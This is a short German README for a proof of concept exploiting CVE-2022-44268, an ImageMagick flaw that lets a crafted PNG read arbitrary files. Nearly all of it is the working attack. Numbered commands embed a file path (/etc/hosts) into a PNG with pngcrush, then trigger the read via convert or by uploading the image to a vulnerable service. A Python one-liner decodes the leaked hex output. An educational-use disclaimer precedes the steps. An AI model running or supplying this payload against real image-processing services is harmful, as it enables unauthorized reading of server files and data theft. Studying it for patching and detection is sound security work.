CVE-2022-44268 ImageMagick PoC zum Auslesen beliebiger Dateien
PoC für CVE-2022-44268 ImageMagick PoC zum Auslesen beliebiger Dateien - Payload-Generator
Dieses Projekt wurde nur zu Bildungszwecken erstellt und darf nicht für Gesetzesverstöße oder persönlichen Gewinn genutzt werden.
Der Autor dieses Projekts übernimmt keine Verantwortung für mögliche Schäden, die durch die Materialien dieses Projekts verursacht werden.
Verwendung:
Abhängigkeiten installieren:
1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y
Ändern Sie den Dateinamen, den Sie lesen möchten, unten:
2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png
Bestätigen, dass alles einwandfrei funktioniert hat
3. $ exiv2 -pS pngout.png
Lösen Sie das PoC über convert aus oder laden Sie das Bild auf den anfälligen Dienst hoch:
4. $ convert pngout.png gopro.png
Inhalt der gelesenen Datei anzeigen:
5. $ identify -verbose gopro.png
Inhalt entschlüsseln:
6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'
Demo
Getestet mit Ubuntu 22.04 und standardmäßig installiertem ImageMagick.